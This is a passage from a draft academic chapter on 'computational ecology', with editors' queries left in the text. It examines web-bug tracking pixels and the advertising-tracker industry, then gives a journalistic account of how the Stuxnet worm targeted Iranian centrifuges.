&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
